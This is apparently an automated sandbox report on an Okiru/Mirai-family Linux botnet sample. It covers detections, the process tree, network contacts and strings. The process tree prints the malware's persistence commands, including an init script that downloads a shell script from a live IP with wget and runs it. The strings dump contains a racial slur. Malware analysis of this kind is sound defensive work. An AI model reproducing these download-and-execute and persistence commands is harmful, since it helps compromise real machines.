Edit tour

Linux Analysis Report
arm.nn.elf

Overview

General Information

Sample name:	arm.nn.elf
Analysis ID:	1580234
MD5:	e2f7e7155399c4035b2c1c805c721610
SHA1:	d2e386a8c5f65ca9f1aec178298c545a25d58c7d
SHA256:	b223160a9b5e58400e86e34c50d2d36d1d874eabdc272641a8d66eed75245493
Tags:	elfuser-abuse_ch
Infos:

Detection

Okiru

Score:	72
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Yara detected Okiru

Drops files in suspicious directories

Sample tries to persist itself using /etc/profile

Sample tries to persist itself using System V runlevels

Sample tries to set files in /etc globally writable

Detected TCP or UDP traffic on non-standard ports

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "mkdir" command used to create folders

Executes the "rm" command used to delete files or directories

Executes the "systemctl" command used for controlling the systemd system and service manager

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Sample listens on a socket

Sample tries to set the executable flag

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Uses the "uname" system call to query kernel version information (possible evasion)

Writes shell script file to disk with an unusual file extension

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580234
Start date and time:	2024-12-24 05:32:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	arm.nn.elf
Detection:	MAL
Classification:	mal72.spre.troj.evad.linELF@0/10@0/0

Runtime Messages

Command:	/tmp/arm.nn.elf
PID:	6254
Exit Code:	139
Exit Code Info:	SIGSEGV (11) Segmentation fault invalid memory reference
Killed:	False
Standard Output:
Standard Error:	qemu: uncaught target signal 11 (Segmentation fault) - core dumped

Process Tree

system is lnxubuntu20

dash New Fork (PID: 6225, Parent: 4331)

rm (PID: 6225, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.euLig1AMQx /tmp/tmp.MKEFwQBc8l /tmp/tmp.p9eEBykA8q

dash New Fork (PID: 6226, Parent: 4331)

rm (PID: 6226, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.euLig1AMQx /tmp/tmp.MKEFwQBc8l /tmp/tmp.p9eEBykA8q

arm.nn.elf (PID: 6254, Parent: 6156, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm.nn.elf

arm.nn.elf New Fork (PID: 6271, Parent: 6254)

sh (PID: 6271, Parent: 6254, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"

sh New Fork (PID: 6279, Parent: 6271)

systemctl (PID: 6279, Parent: 6271, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service

arm.nn.elf New Fork (PID: 6305, Parent: 6254)

sh (PID: 6305, Parent: 6254, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"

sh New Fork (PID: 6311, Parent: 6305)

chmod (PID: 6311, Parent: 6305, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/system

arm.nn.elf New Fork (PID: 6312, Parent: 6254)

sh (PID: 6312, Parent: 6254, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"

sh New Fork (PID: 6314, Parent: 6312)

ln (PID: 6314, Parent: 6312, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/system /etc/rcS.d/S99system

arm.nn.elf New Fork (PID: 6315, Parent: 6254)

sh (PID: 6315, Parent: 6254, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm.nn.elf'\n /tmp/arm.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping arm.nn.elf'\n killall arm.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm.nn.elf"

arm.nn.elf New Fork (PID: 6317, Parent: 6254)

sh (PID: 6317, Parent: 6254, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/arm.nn.elf >/dev/null 2>&1"

sh New Fork (PID: 6319, Parent: 6317)

chmod (PID: 6319, Parent: 6317, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/arm.nn.elf

arm.nn.elf New Fork (PID: 6320, Parent: 6254)

sh (PID: 6320, Parent: 6254, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"

sh New Fork (PID: 6322, Parent: 6320)

mkdir (PID: 6322, Parent: 6320, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d

arm.nn.elf New Fork (PID: 6323, Parent: 6254)

sh (PID: 6323, Parent: 6254, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/arm.nn.elf /etc/rc.d/S99arm.nn.elf >/dev/null 2>&1"

sh New Fork (PID: 6325, Parent: 6323)

ln (PID: 6325, Parent: 6323, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/arm.nn.elf /etc/rc.d/S99arm.nn.elf

arm.nn.elf New Fork (PID: 6326, Parent: 6254)

arm.nn.elf New Fork (PID: 6328, Parent: 6326)

udisksd New Fork (PID: 6267, Parent: 799)

dumpe2fs (PID: 6267, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

systemd New Fork (PID: 6292, Parent: 6291)

snapd-env-generator (PID: 6292, Parent: 6291, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

udisksd New Fork (PID: 6340, Parent: 799)

dumpe2fs (PID: 6340, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 6360, Parent: 799)

dumpe2fs (PID: 6360, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
arm.nn.elf	JoeSecurity_Okiru	Yara detected Okiru	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
6254.1.00007f8774017000.00007f877402d000.r-x.sdmp	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
Process Memory Space: arm.nn.elf PID: 6254	JoeSecurity_Okiru	Yara detected Okiru	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: arm.nn.elf

Avira: detected

Source: arm.nn.elf

String: getinfo xxxTSource Engine QueryNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe/proc/...%s/%stmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusrPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234locked Process: PID=%d, Bot-ID:%sFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/./fd/socket/proc/%d/mountinfo/ /proc-altered/tmp/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/ping/pswiresharkechotcpdumpnetstatpythoniptablesnanonvimvimgdbpkillkillallapt/bin/loginnfstftpftpmalloc[start_pid_hopping] Failed to clone: %s

Source: global traffic

TCP traffic: 192.168.2.23:60008 -> 94.156.227.234:38242

Source: /tmp/arm.nn.elf (PID: 6254)

Socket: 0.0.0.0:38242

Jump to behavior

Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234

Source: arm.nn.elf, system.16.dr, inittab.16.dr, arm.nn.elf.36.dr, profile.16.dr, custom.service.16.dr, bootcmd.16.dr	String found in binary or memory: http://94.156.227.233/
Source: arm.nn.elf	String found in binary or memory: http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: getinfo xxxTSource Engine QueryNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe/proc/...%s/%stmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusrPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234locked Process: PID=%d, Bot-ID:%sFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/./fd/socket/proc/%d/mountinfo/ /proc-altered/tmp/usr/lib/systemd//usr/sbin//usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd*deamon/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/g

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal72.spre.troj.evad.linELF@0/10@0/0

Persistence and Installation Behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/arm.nn.elf (PID: 6254)

File: /etc/profile

Jump to behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/arm.nn.elf (PID: 6254)	File: /etc/rc.local	Jump to behavior
Source: /usr/bin/ln (PID: 6314)	File: /etc/rcS.d/S99system -> /etc/init.d/system	Jump to behavior
Source: /usr/bin/ln (PID: 6325)	File: /etc/rc.d/S99arm.nn.elf -> /etc/init.d/arm.nn.elf	Jump to behavior

Sample tries to set files in /etc globally writable

Source: /tmp/arm.nn.elf (PID: 6254)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6311)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6319)	File: /etc/init.d/arm.nn.elf (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/arm.nn.elf (PID: 6328)	File opened: /proc/6399/status	Jump to behavior
Source: /tmp/arm.nn.elf (PID: 6328)	File opened: /proc/799/cmdline	Jump to behavior
Source: /tmp/arm.nn.elf (PID: 6328)	File opened: /proc/6403/status	Jump to behavior
Source: /tmp/arm.nn.elf (PID: 6328)	File opened: /proc/6425/status	Jump to behavior
Source: /tmp/arm.nn.elf (PID: 6328)	File opened: /proc/6402/status	Jump to behavior
Source: /tmp/arm.nn.elf (PID: 6328)	File opened: /proc/6424/status	Jump to behavior
Source: /tmp/arm.nn.elf (PID: 6328)	File opened: /proc/6427/status	Jump to behavior
Source: /tmp/arm.nn.elf (PID: 6328)	File opened: /proc/6426/status	Jump to behavior
Source: /tmp/arm.nn.elf (PID: 6328)	File opened: /proc/6429/status	Jump to behavior
Source: /tmp/arm.nn.elf (PID: 6328)	File opened: /proc/6428/status	Jump to behavior
Source: /tmp/arm.nn.elf (PID: 6328)	File opened: /proc/6067/cmdline	Jump to behavior
Source: /tmp/arm.nn.elf (PID: 6328)	File opened: /proc/6421/status	Jump to behavior
Source: /tmp/arm.nn.elf (PID: 6328)	File opened: /proc/6420/status	Jump to behavior
Source: /tmp/arm.nn.elf (PID: 6328)	File opened: /proc/6401/status	Jump to behavior
Source: /tmp/arm.nn.elf (PID: 6328)	File opened: /proc/6423/status	Jump to behavior
Source: /tmp/arm.nn.elf (PID: 6328)	File opened: /proc/6400/status	Jump to behavior
Source: /tmp/arm.nn.elf (PID: 6328)	File opened: /proc/6422/status	Jump to behavior
Source: /tmp/arm.nn.elf (PID: 6328)	File opened: /proc/6360/status	Jump to behavior
Source: /tmp/arm.nn.elf (PID: 6328)	File opened: /proc/6414/status	Jump to behavior
Source: /tmp/arm.nn.elf (PID: 6328)	File opened: /proc/6413/status	Jump to behavior
Source: /tmp/arm.nn.elf (PID: 6328)	File opened: /proc/6416/status	Jump to behavior
Source: /tmp/arm.nn.elf (PID: 6328)	File opened: /proc/6415/status	Jump to behavior
Source: /tmp/arm.nn.elf (PID: 6328)	File opened: /proc/6418/status	Jump to behavior
Source: /tmp/arm.nn.elf (PID: 6328)	File opened: /proc/6417/status	Jump to behavior
Source: /tmp/arm.nn.elf (PID: 6328)	File opened: /proc/6419/status	Jump to behavior

Source: /tmp/arm.nn.elf (PID: 6271)	Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"	Jump to behavior
Source: /tmp/arm.nn.elf (PID: 6305)	Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/arm.nn.elf (PID: 6312)	Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/arm.nn.elf (PID: 6315)	Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm.nn.elf'\n /tmp/arm.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping arm.nn.elf'\n killall arm.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm.nn.elf"	Jump to behavior
Source: /tmp/arm.nn.elf (PID: 6317)	Shell command executed: sh -c "chmod +x /etc/init.d/arm.nn.elf >/dev/null 2>&1"	Jump to behavior
Source: /tmp/arm.nn.elf (PID: 6320)	Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"	Jump to behavior
Source: /tmp/arm.nn.elf (PID: 6323)	Shell command executed: sh -c "ln -s /etc/init.d/arm.nn.elf /etc/rc.d/S99arm.nn.elf >/dev/null 2>&1"	Jump to behavior

Source: /bin/sh (PID: 6311)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/system			Jump to behavior
Source: /bin/sh (PID: 6319)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/arm.nn.elf			Jump to behavior

Source: /bin/sh (PID: 6322)

Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.d

Jump to behavior

Source: /usr/bin/dash (PID: 6225)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.euLig1AMQx /tmp/tmp.MKEFwQBc8l /tmp/tmp.p9eEBykA8q			Jump to behavior
Source: /usr/bin/dash (PID: 6226)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.euLig1AMQx /tmp/tmp.MKEFwQBc8l /tmp/tmp.p9eEBykA8q			Jump to behavior

Source: /bin/sh (PID: 6279)

Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.service

Jump to behavior

Source: /tmp/arm.nn.elf (PID: 6254)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6311)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6319)	File: /etc/init.d/arm.nn.elf (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/arm.nn.elf (PID: 6254)	Writes shell script file to disk with an unusual file extension: /etc/init.d/system	Jump to dropped file
Source: /tmp/arm.nn.elf (PID: 6254)	Writes shell script file to disk with an unusual file extension: /etc/rc.local	Jump to dropped file
Source: /bin/sh (PID: 6315)	Writes shell script file to disk with an unusual file extension: /etc/init.d/arm.nn.elf	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/arm.nn.elf (PID: 6254)	File: /etc/init.d/system			Jump to dropped file
Source: /bin/sh (PID: 6315)	File: /etc/init.d/arm.nn.elf			Jump to dropped file

Source: /tmp/arm.nn.elf (PID: 6254)

Queries kernel information via 'uname':

Jump to behavior

Source: arm.nn.elf, 6254.1.0000564bb3e37000.0000564bb3f85000.rw-.sdmp	Binary or memory string: KV!/etc/qemu-binfmt/arm
Source: arm.nn.elf, 6254.1.0000564bb3e37000.0000564bb3f85000.rw-.sdmp	Binary or memory string: /usr/bin/vmtoolsd
Source: arm.nn.elf, 6254.1.00007ffd002b1000.00007ffd002d2000.rw-.sdmp	Binary or memory string: KV/tmp/qemu-open.vEDlp5
Source: arm.nn.elf, 6254.1.0000564bb3e37000.0000564bb3f85000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm
Source: arm.nn.elf, 6254.1.00007ffd002b1000.00007ffd002d2000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-arm
Source: arm.nn.elf, 6254.1.0000564bb3e37000.0000564bb3f85000.rw-.sdmp	Binary or memory string: !/proc/2018/exe0!/usr/bin/vmtoolsd1/proc/1/cgroup/arm/sr10!/proc/2014/exe0!/proc/759/exe!/proc/2077/exe/arm/pro
Source: arm.nn.elf, 6254.1.00007ffd002b1000.00007ffd002d2000.rw-.sdmp	Binary or memory string: /tmp/qemu-open.vEDlp5
Source: arm.nn.elf, 6254.1.00007ffd002b1000.00007ffd002d2000.rw-.sdmp	Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: arm.nn.elf, 6254.1.00007ffd002b1000.00007ffd002d2000.rw-.sdmp	Binary or memory string: vlx86_64/usr/bin/qemu-arm/tmp/arm.nn.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm.nn.elf

Stealing of Sensitive Information

Yara detected Okiru

Source: Yara match	File source: arm.nn.elf, type: SAMPLE
Source: Yara match	File source: 6254.1.00007f8774017000.00007f877402d000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: arm.nn.elf PID: 6254, type: MEMORYSTR

Remote Access Functionality

Yara detected Okiru

Source: Yara match	File source: arm.nn.elf, type: SAMPLE
Source: Yara match	File source: 6254.1.00007f8774017000.00007f877402d000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: arm.nn.elf PID: 6254, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	Windows Management Instrumentation	1 Unix Shell Configuration Modification	1 Unix Shell Configuration Modification	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 Data Manipulation
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Systemd Service	1 Systemd Service	2 File and Directory Permissions Modification	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Scripting	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Source	Detection	Scanner	Label	Link
arm.nn.elf	100%	Avira	EXP/ELF.Mirai.W

Dropped Files

Source	Detection	Scanner	Label	Link
/etc/rc.local	0%	ReversingLabs

Name	Source	Malicious	Antivirus Detection	Reputation
http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s	arm.nn.elf	false		high
http://94.156.227.233/	arm.nn.elf, system.16.dr, inittab.16.dr, arm.nn.elf.36.dr, profile.16.dr, custom.service.16.dr, bootcmd.16.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
94.156.227.234	unknown	Bulgaria	57463	NETIXBG	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
109.202.202.202	kpLwzBouH4.elf	Get hash	malicious	Unknown	Browse	ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
94.156.227.234	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	arm7.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	arm7.nn-20241224-0051.elf	Get hash	malicious	Mirai, Okiru	Browse
	sparc.nn.elf	Get hash	malicious	Okiru	Browse
	arm5.nn-20241224-0050.elf	Get hash	malicious	Okiru	Browse
	arm.nn-20241224-0050.elf	Get hash	malicious	Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
91.189.91.43	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	nklarm6.elf	Get hash	malicious	Unknown	Browse
	nabarm6.elf	Get hash	malicious	Unknown	Browse
	zerarm6.elf	Get hash	malicious	Unknown	Browse
	armv4eb.elf	Get hash	malicious	Unknown	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	tftp.elf	Get hash	malicious	Unknown	Browse
	bot.sh4.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CANONICAL-ASGB	x86_32.nn.elf	Get hash	malicious	Okiru	Browse	185.125.190.26
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	91.189.91.42
	nklarm6.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	splarm6.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
	nabarm6.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	zerppc.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
	zerarm5.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
	zermips.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
	zerm68k.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	zerarm6.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
CANONICAL-ASGB	x86_32.nn.elf	Get hash	malicious	Okiru	Browse	185.125.190.26
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	91.189.91.42
	nklarm6.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	splarm6.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
	nabarm6.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	zerppc.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
	zerarm5.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
